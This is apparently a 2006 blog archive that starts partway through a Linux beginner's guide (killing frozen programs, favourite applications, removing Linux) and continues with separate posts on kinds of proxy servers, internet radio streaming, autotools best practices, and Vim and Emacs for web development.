kill -9 2288
A more direct way is to use pkill, say as
pkill -9 x
where x is the name of the program being run. (Warning: This will result in all processes of that name being killed.)
What if your program has taken over the entire screen, so you can’t get to a window to kill the program? One solution would be to hit Alt F2, which will bring up a little window in which you can run a command, say pkill as above. Another solution would be to switch to another workspace, i.e. an entirely different (virtual) screen. You have four of them if you are running KDE or GNOME. In the former case, hit Ctrl-Alt-Right Arrow and in the latter case, Ctrl-F2. Set up a terminal window if you don’t already have one in that workspace, run pkill or whatever, and then Ctrl-Alt-Left Arrow or Ctrl-F1, respectively, to return to your original workspace.
A more drastic solution would be to close down KDE or GNOME entirely, by typing Ctrl-Alt-Backspace.
After that the login prompt will come up, and you can re-login. However, all your windows and applications that had been running will now be gone.
Try NOT to simply poweroff the machine, as that may do damage to your files.
Linux Applications Software
GUI Vs. Text-Based
Sophisticated Linux users tend to use text-based applications, rather than GUI ones, even though excellent
GUI applications are available. For instance, I and many others like the mutt e-mail utility
which is text-based. Here’s why, at least in my view:
• I often access my Linux machine remotely, while traveling.23 I might be at a university library, for instance, or at the business center in a hotel, and be "stuck" with a Windows machine, and logging in to my Linux machine via an SSH connection.24 This limits me to text.
• It’s very important to me that I use the same text editor for all my computer applications—e-mail, programming, word processing, etc.—so that I can take advantage of all the abbreviations, shortcuts and so on which I have built up over the years. This saves me huge amounts of typing. But most GUI applications, e.g. e-mail utilities, have their own built-in text editors, so I can’t use mine.
• I find that text-based applications often have more features, are better documented, etc.
However, in listing my favorite applications in Section 6.2 below, I’ve made sure to list both text-based and
GUI programs.
My Favorite Unix/Linux Utilities and Applications
Text Editing
I use a modern extension to the vi editor, vim. This is the version of vi which is built in to most Linux
Note: In the Fedora distro, somehow the version of vim that is linked to vi isn’t configured fully correctly. I suggest using /usr/bin/vim directly.
Even though vim is text-based, it does have a GUI version too, gvim. This comes with nice icons, allows you to do mouse operations, etc. Unfortunately, most Linux distros seem to have only the text-based program.
To get the GUI, you can download it yourself. See my tutorial on how to do this.

Web Browsing

Your Linux distro will come with a Web browser, either Konqueror or Epiphany, and possibly Firefox. If you don’t have the latter, download it from theWeb, www.mozilla.org/products/firefox/. And by the way, it’s available for Windows too.
I almost always use Firefox. But believe it or not, sometimes I use the famous text-based browser, lynx. In some caes, it is just plain quicker and easier.
Your Firefox system may not be configured for Java. If so, see www.mozilla.org/support/firefox/

E-Mail
I use the mutt e-mail utility. It is very flexible and customizable, and excellent features. For example, it has great search capabilities, important if you are a heavy e-mail user. I like its ability to record the fact that one has already replied to a message, and the fact that it allows you to save partially-written message for a later time when you can finish writing it. It is text-based, not GUI, but the functionality it gives is what really counts. If you prefer a GUI-based mail utility, many nice ones exist for Linux. Check the Web for these, or use the Thunderbird e-mail utility in the Firefox Web browser suite.

HTML Editing
I usually use Vim, along with some macros I’ve written for HTML editing, but I sometimes use Amaya, which is a full-featured WYSIWYG HTML editor, written by the Web policy consortium. One nice feature is that you can actually use the embedded Web links, good for testing them.
very nice things about a newer and more powerful package, Quanta+ (http://quanta.kdewebdev.org).
Integrated Software Development (IDE) For C/C++ work, I actually don’t use an IDE. I find that the vim editor (cited above) and the ddd GUI interface to the gdb debugging tool, work great together. For example in vim I can type :make (which I have aliased to just M, or with gvim click on the hammer icon, and the source code I’m debugging will b recompiled. And as I’ve mentioned, it’s important to me that I use the same text editor for all applications, It can be used with C, C++, Java, Perl, Python and many others.
Also, for KDE users, there is a very well-received IDE named KDevelop. I lean toward Eclipse, though, as it is easier to learn, is cross-platform, and can be used with more programming languages.

Word Processing
I use LATEX because of its flexibility, its beautiful output, and its outstanding ability to do math. You may like Lyx, which is a great WYSIWYG interface to LATEX which is especially good for math work.
If you wish to work with files compatible with the Microsoft Office environment, there is a free suite of programs, OpenOffice, which provide Microsoft compatibility. It is packaged with most Linux distributions. Playing Movies, DVDs, Etc.
MPlayer is free and very good. You do have to compile it yourself, but its capabilities are quite broad.
The documentation is extensive, and hard to navigate, but here are a couple of things to get you started:
To play a movie you have the file for, say x.avi, type
mplayer x.avi
To play a DVD, put the disk in the tray and mount the device (see Section 5.5). Then type mplayer dvd://1 -dvd-device /mnt/cdrom
There are many, MANY different options.
You may wish to try other players, e.g. Xine or Ogle.
Image Manipulation and Drawing
Want something like Adobe Photoshop? The GIMP program is quite powerful, and free. It’s included with most Linux distributions.
You can use GIMP to draw, but for "quick and dirty" tasks, I would suggest Dia, at http://www.gnome.org/projects/dia/.
Accessing Usenet Newsgroups
Linux distros generally come a text-based newsreader, either slrn or tin. I generally use slrn, but am not that happy with any known newsreader.
In the GUI arena, I sometimes use pan. You can download it from pan.rebelbase.com.
Firefox’s Thunderbird program includes a newsreader too.
I usually use the text-based ftp and sftp, the latter being an SSH version for security.
A very nice GUI program, though, is gftp, which you can download from the Web if your Linux system doesn’t already have it. In addition to the GUI, this program also has some functionality which ordinary

FTP programs don’t have.

Statistical Analysis

Use the statistical package that the professional statisticians use—R!
In my opinion from the point of view of someone with a "foot in both camps"—I’m a computer science professor who used to be a statistics professor—the R statistical package is the best one around, whether open source or commercial. It is statistically modern and correct, and it also is a general-purpose programming language.

Using RPMs
You can add more programs from your Linux CD-ROM or from theWeb (most of them are free). They tend to be in RPM packages, with .rpm suffixes in their names. To install such a package, type
rpm -i package_file_name
If you later wish to remove, i.e. uninstall a package, you can use rpm -e (‘e’ stands for "erase"). You do NOT have to have the RPM file present to do this.
Some packages will have different versions for different C libraries. Red Hat uses glibc. Type ls -l /lib/libc* to see which version you have.
You may find that you need some library files for a program you download, and that you are missing those files. You can usually get these from the Web too. If a program complains about a missing file, try the ldd command (e.g. ldd x if the name of the program which needs the library is x); this will tell you which libraries are needed, where they were found on your system, and which ones, if any, were not found.
Learning More About Linux
Wanna Get Good at Linux? Use It for Everything!
The only way to really learn Linux is to use it on a daily basis for all your computer work—e-mail, word processing, Web work, etc.
As you do this, the expertise you’ll want to pick up includes: file, directory and mount operations; process operations; roles of system directories (/usr, /etc, /dev and their various subdirectories, e.g. /usr/lib; search paths; network operation and utilities such as netstat; and so on. Don’t try to do this all at once.
Instead, take your time, and learn these naturally, as the need arises. As you use Linux more and more in your daily computer application work (e-mail, word processing, etc.), the needs will arise as you go along.
In some respects, it’s even better than S, the commercial product it is based on.
And remember, there’s lots of help available if you need it.
Getting Help
Newsgroups
There are various Usenet newsgroups devoted to Linux, a few of which are:
comp.os.linux.setup
comp.os.linux.hardware
comp.os.linux.answers
comp.os.linux.announce (excellent for news of new programs, mostly free, that run under Linux)
By the way, if you have a problem with hardware and post a query about it to a newsgroup, it is a good idea to include the output from the dmesg command. It gives a record of what occurred during bootup.

The Web
• Linux home page, at http://www.linux.org/ Lots and lots of information is available here.
• www.linux.com. Chock full of information and links.
• Google’s excellent set of links to various Linux sites, http://directory.google.com/Top/
Computers/Software/Operating Systems/Linux
• Another good set of Linux links, http://www.linuxjunior.org/resources.shtml
• If you are having trouble with specific hardware in your Linux installation, an excellent place to go for detailed information is the Linux HOW-TO documentation. (For the same reason, if you are
about to purchase a machine and suspect that some of the hardware is nonstandard, you can check the corresponding Linux HOW-TO to see if there are any problems with that hardware.
The HOW-TO documents are available at many sites, such as the one at linux.org.

LUGs
There are Linux Users Groups (LUGs) in virtually every city. You can join if you wish, or just get to know them casually. They are great sources of help! And by the way, many of them hold monthly Linux Installfests, where you can see Linux being installed or have it installed on your own machine.
What to Do in an Emergecny
One of Linux’s biggest strengths is its stability. If you are tired of getting Windows’ infamous "blue screen of death," then Linux is the OS for you. (It is also subject to far fewer virus and other attacks thanWindows.)
So emergencies are rare, but they can happen. Here is what to do in such a case:
If an application program freezes up and you invoked it from the command line within a shell, you can in most cases kill it by hitting Ctrl-c in the terminal window from which invoked it. If this doesn’t work, run the "processes" command by typing
ps ax
in another terminal window, and noting the process number of your program. Say for concreteness that that number is 2398. Then type kill -9 2398 to kill the program.
What if your entire screen freezes up? Again, this should be quite rare, but it is possible. I recommend the following remedies, in order:

• Try going to another screen! Linux allows you to switch among multiple screens. You can switch to the second screen via Alt F2 or Ctrl 2, depending on your system. Then open a terminal window in the new screen, find the process number of the program and kill the program, as described above.
• Try hitting Ctrl Alt Backspace (all keys simultaneously). This should cause an exit from Linux’s X11 windowing system but not an exit from Linux itself. You would then get an opportunity to log in again.

• As a last resort, try the famous Ctrl Alt Delete, to cause a reboot.
If You Are Upgrading or Replacing Another Version or Distribution of Linux (If you are installing Linux from scratch, skip this section.) Suppose you already have Linux installed but are upgrading to a newer version of the same distribution or changing to a different distribution. First of course you will want to make sure you back up your old files, just in case sometimes goes wrong.
Note that in addition to any "personal" files you have, you may also have added some downloaded packages, whose files are now in places like /usr/local/. You may also have modified files in /etc, such as
/etc/resolv.conf. You may wish to tar these into a save file too. (Don’t copy the Linux system files, .e.g in /usr/bin, though, since you want them to be replaced by their counterparts in the new version of Linux.)
Accessing Your Windows Files from Linux
Some Linux distributions give you access (at least read access) to your Windows partition from Linux, say as some subdirectory of /mnt. Fedora/Linux does not do this, but you can add free software for this purpose from the Linux-NTFS Project, http://www.linux-ntfs.org/
If You Wish to Remove Linux
If you wish to remove Linux from your machine, first run Linux’s version of fdisk and remove all the Linux partitions. (Be careful not to remove the DOS/Windows partitions!)
Then boot up Windows, and remove LILO/GRUB as follows. First, get a command window by clicking Start | Run | cmd Then type
c:\
cd \windows\command
fdisk /mbr
Subsequently Windows will boot up as it did before you installed Linux.
Finally, use Windows’ diskpart to recover the former Linux space as Windows partitions.

SSL proxies

2006-09-05T12:26:00.000+07:00

A growing subset of Web traffic uses HTTPS to create an encrypted tunnel. Regulations often require all Intranet and ASP applications handling sensitive data to use encryption. Traditional (HTTP) proxies can not cache encrypted traffic; hence provide no acceleration, control or bandwidth savings for SSL applications.

HTTPS Proxy are specifically designed to decrypt, apply policy, cache and re-encrypt SSL traffic. As a result, HTTPS Proxy can transparently monitor, control and accelerate SSL traffic. HTTPS Proxy can also apply malware scanning and content filtering to inhibit phishing, spyware and computer viruses hiding inside encrypted tunnels.

There are privacy concerns with SSL proxy. In essence, the IT department is conducting a Man-in-the-middle attack, potentially exposing sensitive corporate information, personal online banking information, etc. Countries such as Sweden have very strong privacy laws, which may require the HTTPS Proxy to handle corporate information with different policy than personal traffic. Content filtering can differentiate this traffic. Additional compromise policy options include caching GIF and JPEG objects (which typically are user interface elements and lack confidential data), but exclude from caching HTML and TXT traffic.

Sometimes the term "SSL proxy" also refers to CGI web proxies that are accessible via encrypted SSL connections. In this case, SSL adds an extra layer of security on top of the CGI proxy system, lessening the chance of data interception.

Transparent proxies

2006-09-05T12:25:00.000+07:00

Many organizations — including corporations, schools, and families — use a proxy server to enforce acceptable network use policies (see censorware) or to provide security, anti-malware and/or caching services. A traditional web proxy is not transparent to the client application, which must be configured to use the proxy (manually or with a configuration script). In some cases, where alternative means of connection to the Internet are available (e.g. a SOCKS server or NAT connection), the user may be able to avoid policy control by simply resetting the client configuration and bypassing the proxy. Furthermore administration of browser configuration can be a burden for network administrators.

A transparent proxy or intercepting proxy (also known as a forced proxy) combines a proxy server with NAT. Connections made by client browsers through the NAT are intercepted and redirected to the proxy without client-side configuration (or often knowledge).

Transparent proxies are commonly used in businesses to prevent avoidance of acceptable use policy, and to ease administrative burden, since no client browser configuration is required.

Transparent proxies are also commonly used by Internet Service Providers in many countries in order to reduce upstream link bandwidth requirements by providing a shared cache to their customers.

It is often possible to detect the use of a transparent proxy server by comparing the external IP address to the address seen by an external web server, or by examining the HTTP headers on the server side.

Open proxies

2006-09-05T11:53:00.000+07:00

An open proxy is a proxy server which will accept client connections from any IP address and make connections to any Internet resource. Abuse of open proxies is currently implicated in a significant portion of e-mail spam delivery. Spammers frequently install open proxies on unwitting end users' operating systems by means of computer viruses designed for this purpose. Internet Relay Chat (IRC) abusers also frequently use open proxies to cloak their identities.

Because proxies might be used for abuse, system administrators have developed a number of ways to refuse service to open proxies. IRC networks such as the Blitzed network automatically test client systems for known types of open proxy [1]. Likewise, an email server may be configured to automatically test e-mail senders for open proxies, using software such as Michael Tokarev's proxycheck [2].

Groups of IRC and electronic mail operators run DNSBLs publishing lists of the IP addresses of known open proxies, such as AHBL, CBL [3], NJABL [4], and SORBS.

The ethics of automatically testing clients for open proxies are controversial. Some experts, such as Vernon Schryver, consider such testing to be equivalent to an attacker portscanning the client host. [5] Others consider the client to have solicited the scan by connecting to a server whose terms of service include testing.

Anonymous proxy risks

2006-09-05T11:50:00.000+07:00

In using a proxy server (for example, anonymizing HTTP proxy), all data sent to the service being used (for example, HTTP server in a website) must pass through the proxy server before being sent to the service, mostly in unencrypted form. It is therefore possible, and has been demonstrated (see, for example, Sugarcane) for a malicious proxy server to record everything sent to the proxy: including unencrypted logins and passwords.

By chaining proxies which do not reveal data about the original requestor, it is possible to obfuscate activities from the eyes of the user's destination. However, more traces will be left on the intermediate hops, which could be used or offered up to trace the user's activities. If the policies and administrators of these other proxies are unknown, the user may fall victim to a false sense of security just because those details are out of sight and mind.

The bottom line of this is to be wary when using proxy servers, and only use proxy servers of known integrity (e.g., the owner is known and trusted, has a clear privacy policy, etc.), and never use proxy servers of unknown integrity. If there is no choice but to use unknown proxy servers, do not pass any private information (unless it is properly encrypted) through the proxy.

More of an inconvenience than a risk, proxy users may find themselves being blocked from certain websites, as numerous forums and websites block IP addresses from proxies known to have spammed or trolled the site.

Web proxies

2006-09-05T11:45:00.000+07:00

A common proxy application is a caching web proxy. This provides a nearby cache of web pages and files available on remote web servers, allowing local network clients to access them more quickly or reliably.
When it receives a request for a web resource (specified by a URL), a caching proxy looks for the resulting URL in its local cache. If found, it returns the document immediately. Otherwise it fetches it from the remote server, returns it to the requester and saves a copy in the cache. The cache usually uses an expiry algorithm to remove documents from the cache, according to their age, size, and access history. Two simple cache algorithms are Least Recently Used (LRU) and Least Frequently Used (LFU). LRU removes the documents that have been left the longest, while LFU removes the least popular documents. The algorithms can also be combined.
Web proxies can also filter the content of web pages served. Some censorware applications — which attempt to block offensive web content — are implemented as web proxies. Other web proxies reformat web pages for a specific purpose or audience; for example, Skweezer reformats web pages for cell phones and PDAs. Network operators can also deploy proxies to intercept computer viruses and other hostile content served from remote web pages.
A special case of web proxies are "CGI proxies." These are web sites which allow a user to access a site through them. They generally use PHP or CGI to implement the proxying functionality. CGI proxies are frequently used to gain access to web sites blocked by corporate or school proxies. Since they also hide the user's own IP address from the web sites they access through the proxy, they are sometimes also used to gain a degree of anonymity, called "Proxy Avoidance."

Internet radio

2006-09-05T11:10:00.000+07:00

Internet radio technology

Streaming
One of the most common ways to distribute internet radio is via streaming technology using a lossy audio codec. The MP3 codec is most popular, followed by Ogg Vorbis, Windows Media Audio, and RealAudio; use of HE-AAC (sometimes called aacPlus) is gaining in popularity. The bits are "streamed" over a TCP/IP connection, then reassembled and played within about 2 seconds. Therefore, streaming radio has about a two-second lag time.

There are three major components to an audio stream:
Audio stream source
Audio stream repeater (server)
Audio stream playback

There are many methods for creating the audio stream source. Those more technologically savvy may opt for the SHOUTcast service, which utilizes Winamp and the SHOUTcast DSP plugin to deliver MP3 audio at higher bitrates. Other methods include open source technologies such as Streamcast, stream-db, IceS, and MuSE, and patent-free data formats such as Ogg Vorbis. Using open source stream source tools allows for interesting web interface possibilities like phpStreamcast.

Two of the most popular internet radio networks are Live365 and SHOUTcast. Open source alternatives include Icecast and Xiph.org, which include Ogg Vorbis streamings (that can be played by Winamp and Zinf). Collectively, these internet radio servers list thousands of Internet radio stations covering an ever-expanding variety of genres. The purpose of the server is to repeat the stream source to the audio playback software.
To meet Wikipedia's quality standards and comply with our Neutral Point of View policy, this article or section may require cleanup.
The current version of the article or section reads like an advertisement.
Please discuss this issue on the talk page. Editing help is available.

Sites that aggregrate links of Internet radio broadcasts enable listeners to find internet broadcasts by genre, language, or location.

Some sort of audio playback software or hardware, that is capable of reading HTTP data streams, is needed to listen to streaming MP3 audio. Some popular software players are Winamp for Windows, iTunes for Macintosh and Microsoft Windows, and XMMS on Unix/Linux. Listening to internet radio through hardware devices has not been very popular in the past, due to the limited number of devices on the market, though the availability of such devices and their consumer popularity is expected to increase significantly during 2006. A list of commercially available devices is available at Internet radio device, but many of these are limited in which audio codecs they can use and consequently the variety of internet radio stations they are compatible with.

There is a tradeoff between audio quality and audience size. Stations that encode their streams at a lower bitrate have lower audio quality, but they are more accessible to listeners with a dialup connection, and they can serve more simultaneous users on a given upstream pipe.

There are also a small number of web radio programs that allow users to rate the songs they are listening to. This allows a user's music listening choices to be correlated against those of others, as with the programs iRATE radio, Last.fm, and Radio Paradise.

autotools

2006-09-04T16:58:00.000+07:00

Best practices with autotools

The core of GNU's compile chain -- the set of tools used to build GNU software packages -- is the so-called "autotools," a term that refers to the autoconf and automake programs, as well as libtoolize, autoheader, pkg-config, and sometimes gettext. These tools let you compile GNU software on a wide variety of platforms and Unix and Unix-like operating systems, providing developers a framework to check for the presence of the libraries, functions, and tools that they want to use. While autotools are great in the hands of an experienced developer, they can be quite a handful for the first-time user, and it's not so rare that packages are shipped with working-but-broken autotools support. This article will cover some of the most common errors people make when using autotools and ways to achieve better results.

Regardless of anyone's opinion about them, we currently have no valid alternative for autotools. Projects such as Scons are not as portable as autotools, and they don't embody enough knowledge to be useful yet. We have tons of automatic checks with autotools, and a lot of libraries come with an m4 library with macros to check for their presence.

The basic structure of an autotooled project is simple. Autoconf uses a configure.ac file (formerly configure.in) written in m4 language to create a configure script with the help of an aclocal.m4 file (created by aclocal using the m4 libraries on its search path and acinclude.m4 file). For every directory there's a Makefile.am file, used by automake to create the Makefile.in templates, which are processed and transformed in the real makefiles by the configure script. You can also avoid using automake and just write your own Makefile.in files, but this is quite complex, and you lose a few features of autotools.

In a configure.ac file you can use macros you define yourself, the default ones provided by autoconf and aclocal, or external macros provided, for instance, by other packages. In such a case aclocal will create the aclocal.m4 file adding the library files it finds on the system's library with the defined macros; this is a critical step to have a working autotooled project, as we'll see in a moment.

A Makefile.am is mainly a declaration of intents: you can fill some targets variables with the name of the targets you want to build. These variables are structured in a format like placetoinstall_TYPEOFTARGET. The place is the location in a hierarchical Unix filesystem (bin, lib, include, ...), a non-used keyword that can be defined with an arbitrary path (using the keyworddir variable), or the special keyword noinst that marks the targets that need not to be installed (for example private headers, or static libraries used during build). After naming the target, you can use the name (replacing dots with underscores) as the prefix for the variables that affects its build. In this way you can provide special CFLAGS, LDFLAGS, and LDADD variables used during the build of a single target, instead of changing them for all the targets. You can also use variables collected during configure phase, if you passed them to the AC_SUBST macro in configure.ac, so that they are replaced inside makefiles. Also, though defining CFLAGS and LDFLAGS on a per-target basis seems useful, adding static flags in Makefile.am is a bad thing for portability, as you can't tell if the compiler you're using supports them, or if you really need them (-ldl put in LDFLAGS is a good example of a flag needed on Linux but not on FreeBSD); in such cases you should use configure.ac to add these flags.

The most commonly used macros in configure.ac are AC_CHECK_HEADERS, AC_CHECK_FUNCTS, and AC_CHECK_LIB, which test for the presence of, respectively, some header files, some library functions, and a given library (with a specific function in it). They are important for portability as they provides a way to check which headers are present and which are not (for example system headers that have different locations in different operating systems), and to check whether a function is present in the system library (asprintf() is missing in OpenBSD for example, while it's present on GNU C library and FreeBSD), and finally to check for the presence of some third-party library or to see if a specific link to a library is needed to get some functions (for example dlopen() function is in libdl library on GNU systems, while it's provided by the system's C library on FreeBSD).

Along with testing for the presence or absence of functions or headers (and sometimes libraries) you usually need to change the code's path (for example to avoid the use of missing functions, or to define a drop-in replacement for them). Autoconf is commonly coupled with another tool, autoheader, which creates a config.h.in template, used by configure script to create a config.h header in which are defined a few preprocessor macros in form of HAVE_givenfunction or HAVE_givenheader_H which can be tested with #ifdef/#ifndef directives inside a C or C++ source file to change the code according to the features present.

Here are some practices to keep in mind to help you use autotools to create the most portable code possible.

The config.h header file should be considered to be an internal header file, so it should be used just by the single package in which it's created. You should avoid editing the config.h.in template to add your own code there, as this requires you to manually update it according to the configure.ac you're writing.

Unfortunately a few projects, such as Net-SNMP, export this header file with other libraries' headers, which requires any projects that use their libraries to include them (or provide their own copy of the internal Net-SNMP structures). This is a bad thing, as the autotools structure of a library project should be invisible to software using it (which might not use autotools at all). Also, changes in autotools behavior are anything but rare, so you can have two identical checks with different results due to changes in the way they are executed. If you need to define your own wrappers or replacements in case something is not in the environment you're compiling for, you should do that in private headers that do not get installed (declared as noinst_HEADERS in Makefile.am files).

Always provide the m4 files you used. As autotools have been in use for years, many packages (for example libraries) that can be reused by other programs provide an m4 library file in /usr/share/aclocal that makes it possible to check for their presence (for example using the -config scripts) with a simple macro call. These files are used by aclocal to create the aclocal.m4 file, and they usually are present on the developers' systems where aclocal is executed to create the release, but when they are for optional dependencies, they can be missing on users' systems. While this is usually not a problem, because users rarely executes aclocal, it's a problem for source distributions, such as Gentoo, where sometimes you need to patch a Makefile.am or the configure.ac and then re-run autoconf without having all the optional dependencies installed (or having different versions, which can be incompatible or bugged, of the same m4 file).

To avoid this problem, you should create an m4 subdirectory in your package's directory and then put there the m4 library files you are using. You must then call aclocal with aclocal -I m4 options to search in that directory before the system library. You can then choose whether to put that directory under revision control (CVS, SVN, or whatever else you are using) or just create it for the releases. The latter case is the bare minimum requirement for a package. It minimizes the amount of revision-controlled code and ensures that you're always using the latest m4 version, but has the drawback that anyone who checks out your repository won't be able to execute autoconf without having to look on a release tarball to take the m4 from (and that might not work, as you can have updated the configure.ac to suit a newer macro or added more dependencies). On the other hand, putting the m4 directory under revision control sometimes tempts the developers to change the macros to suit their needs. Although this seems logical, as the m4 files are under your revision control, it will upset many package maintainers, as sometimes new versions of m4 files fix bugs or support newer options and installation paths (for example multilib setups), and having the m4 files modified makes it impossible to just replace them with updated versions. It also mean that when you're going to update an m4 file you must redo the modification against the original.

m4 files are always a problem to work with. They must replicate almost the same code from library to library (depending on the way you need to provide CFLAGS/LDFLAGS: with tests or with a -config script). To avoid this problem, the GNOME and FreeDesktop projects developed a tool called pkg-config, which provides both an executable binary and an m4 file to include in configure.ac files, and lets developers check for the presence of a given library (and/or package), provided that the package itself installed a pkg-config .pc data file. This approach simplifies the work of maintaining configure.ac scripts, and requires a lot less time to be processed during execution of configure script, as it uses the information provided by the installed package itself instead of just trying if it's present. On the other hand, this approach means that an error the developers make concerning a dependency can break the user program, as they just hardcode the compiler and linker flags in the data file and the configure script doesn't actually check whether the library works. Fortunately, this doesn't happen too often.

To create the configure file, you need PKG_CHECK_MODULES, contained in the pkg.m4 library. You should add that file to your m4 directory. If pkg-config dependency is mandatory (as the tool is run by the configure script) you can't be sure that the m4 file you are using is the same as one on users' systems, nor you can be sure that it does not include extra bugs, as it can be older than yours.

Always check for the libraries you're going to link to, if you have them as mandatory dependencies. Usually autoconf macros or pkg-config data files define prerequisite libraries that you need to successfully link to your library. Also, some functions that are in extra libraries in some systems (like dlopen() in libdl on Linux and Mac OS X) can be in the libc of another system (the same function is in libc on FreeBSD). In these cases you need to check whether the function can be found without linking to anything, or if you need to use a specific library (for example to avoid linking to a non-existent libdl that would fail where it's not needed).

Be careful with GNU extensions. One of the things that makes portability a big pain is the use of extension functions, which are provided by GNU libc but aren't present on other C libraries like BSD's or uClibc. When you use such functions, you should always provide a "drop-in replacement," a function that can provide the same functionality as the library function, maybe with less performance or security, which can be used when the extension function is not present on system's C library. Those functions must be protected by a #ifdef HAVE_function ... #endif block, so that they don't get duplicated when they are already present. Make sure that these functions are not exported by the library to the external users; they should be declared inside an internal header, to avoid breaking other libraries that may be doing similar tricks.

Avoid compiling OS-specific code when not needed. When a program optionally supports specific libraries or specific operating systems, it's not rare to have entire source files that are specific to that code path. To avoid compiling them when they're not needed, use the AM_CONDITIONAL macro inside a configure.ac file. This automake macro (usable only if you're using automake to build the project) allows you to define if .. endif blocks inside a Makefile.am file, inside which you can set special variables. You can, for example, add a "platformsrcs" variable that you set to the right source file for the platform to build for, then use in a _SOURCES variable.

However, there are two common errors developers make when using AM_CONDITIONAL. The first is the use of AM_CONDITIONAL in an already conditional branch (for example under an info or in a case switch), which leads to automake complaining about a conditional defined only conditionally (AM_CONDITIONAL must be called on global scope, out of every if block, so you must define a variable to contain the status of the conditions and then test against when calling the AM_CONDITIONAL). The other one is that you can't change the targets' variables directly, and you must define "commodity" variables, whose results empty out of the conditional, to add or remove source files and targets.

Many projects, to avoid compiling code for specific code paths, add the entire files in #ifdef ... #endif preprocessor conditionals. While this usually works, it makes the code ugly and error-prone, as a single statement out of the conditional block can be compiled where the source file is not needed. It also misleads users sometimes, as the source files seem to be compiled in situations where they don't make sense.

Be smart in looking for operating system or hardware platform. Sometimes you need to search for a specific operating system or hardware platform. The right way to do this depends on where you need to know this. If you must know it to enable extra tests on configure, or you must add extra targets on makefiles, you must do the check in configure.ac. On the other hand, if the difference must be known in a source file, for example to enable an optional asm-coded function, you should rely directly on the compiler/preprocessor, so you should use #ifdef directives with the default macros enabled on the target platform (for example __linux__, __i386__, _ARC_PPC, __sparc__, _FreeBSD_ and __APPLE__).

Don't run commands in configure.ac. If you need to check for hardware or operating system in a configure.ac, you should avoid using the uname command, despite this being one of the most common way to do such a test. This is actually an error, as this breaks crosscompilation. Autotools supports crosscompile projects from one machine to another using hosts definitions: strings in the form "hardware-vendor-os" (actually, "hardware-vendor-os-libc" when GNU libc is used), such as i686-pc-linux-gnu and x86_64-unknown-freebsd5.4. CHOST is the host definition for the system you're compiling the software for, CBUILD is the host definition for the system you're compiling on; when CHOST and CBUILD differ, you're crosscompiling.

In the examples above, the first host definition shows an x86-like system, with a pentium2-equivalent (or later) processor, running a Linux kernel with a GNU libc (usually this refers to a GNU/Linux system). The second refers to an AMD64 system with a FreeBSD 5.4 operating system. (For a GNU/kFreeBSD system, which uses FreeBSD kernel and GNU libc, the host definition is hw-unknown-freebsd-gnu, while for a Gentoo/FreeBSD, using FreeBSD's kernel and libc, but with Gentoo framework, the host definition is hw-gentoo-freebsd5.4.) By using $host and $build variables inside a configure.ac script you can enable or disable specific features based on the operating system or on the hardware platform you're compiling to or on.

Don't abuse "automagic" dependencies. One of the most useful features of autotools are the automatic checks for the presence of a library, which are often used to automatically enable support for extra dependencies and such. However, abusing this feature makes the build of a package a bit of a problem. While this is quite useful for first-time users, and although most of the projects having complex dependencies (such as multimedia programs like xine and VLC) use a plugin-based framework that allows them to avoid most of the breakages, "automagic" dependencies are a great pain for packagers, especially ones working on source-based distributions such as Gentoo and ports-like frameworks. When you build something with automagical dependencies you enable the functions supported by the libraries found on the system on which the configure script is run. This means that the output binaries might not work on a system that shares the same base packages but misses one extra library, for example. Also, you can't tell the exact dependencies of a package, as some might be optional and not be built when the libraries are not present.

To avoid this, autoconf allows you to add --enable/--disable and --with/--without options to configure scripts. With such options you can forcefully enable or disable a specific option (such as the support for an extra library or for a specific feature), and leave the default to automatic tests.

Unfortunately, many developers misunderstand the meaning of the two parameters of the functions used to add those options (AC_ARG_ENABLE and AC_ARG_WITH). They represent the code to execute when a parameter is passed and when one is not. Many developers mistakenly think that the two parameters define the code to execute when the feature is enabled and when is disabled. While this usually works when you pass a parameter just to change the default behavior, many source-based distributions pass parameters also to confirm the default behavior, which leads to errors (features explicitely requested missing). Being able to disable optional features if they don't add dependencies (think of OSS audio support on Linux) is always a good thing for users, who can avoid building extra code if they don't plan to use it, and prevents maintainers from doing dirty caching tricks to enable or disable features as their users request.

While autotools were a big problem for both developers and maintainers because there are different incompatible versions that do not get along well together (since they install in the same places, with the same names) and which are used in different combinations, the use of autotools saves maintainers from doing all sorts of dirty tricks to compile software. If you look at ebuild from Gentoo's portage, the few that do not use autotools are the more complex ones, as they need to check variables on very different setups (we can or not have NPTL support; we can be on Linux, FreeBSD, or Mac OS X; we can be using GLIBC or another libc; and so on), while autotools usually take care of that on their own. It's also true that many patches applied by maintainers are to fix broken autotools script in upstream sources, but this is just a little problem compared to the chaos of using special build systems that don't work at all with little environmental changes.

Autotools can be quite tricky for newcomers, but when you start using them on a daily basis you find it's a lot easier than having to deal with manual makefiles or other strange build tools such as imake or qmake, or even worse, special autotools-like build scripts that try to recognize the system they are building on. Autotools makes it simple to support new OSes and new hardware platforms, and saves maintainers and porters from having to learn how to custom-build a system to fix compilation. By carefully writing a script, developers can support new platforms without any changes at all.

Vim and Emacs

2006-09-04T16:55:00.000+07:00

Let's start with a look at two general-purpose editors, Vim and Emacs, that offer some specific features for Web development.

Vim

Vim is one of the most popular text editors for Linux users, and it offers a number of useful features for editing HTML and other languages you might use for Web development.

One of the first features I look for in any editor is syntax highlighting. Vim supports syntax highlighting for HTML, PHP, Python, Perl, CSS, and many other languages. Vim uses syntax files for each markup or programming language, and if it doesn't have a syntax file for your favorite language (unlikely), it's possible to write your own.

Another useful feature in Vim is support for editing files on remote machines. Vim can edit files over FTP, Secure FTP (SFTP), SSH (scp), rsync, and other protocols. This may be a bit slower than editing a local file, but it's otherwise seamless.

Vim is also very extensible. It's not too difficult to add keymaps that insert frequently used tags, and to create scripts or macros to use with Vim. The Vim Web site has quite a few tips on using Vim more effectively, and scripts to extend its functionality.

One script I recommend is the closetag.vim script, which makes it easy to "close" the last tag used. For example, if you've put in a tag, press Ctrl-_ to insert the tag. Another useful add-on for Vim is HTML.vim, which provides a set of mappings and menus for working with HTML.

If you're not familiar with Vim, it's not your best choice for doing Web development. If you have experience with Vim, spend a little time checking out Vim's advanced features that make Web development easy.

Emacs

Like Vim, Emacs enjoys a great deal of popularity amongst Linux users -- although usually not the same users. Emacs is particularly popular with users who've been working with Linux or other Unix-type systems for a long time. As with Vim, Emacs has all the features you'd expect in a world-class text editor that make working with text easy. However, if you're looking for WYSIWYG features, Emacs is not for you.

By itself, Emacs is pretty good for Web development. It supports syntax highlighting for a number of languages, and completion of tags and other standard language keywords so that you don't need to type out the entire HTML tag or keyword.

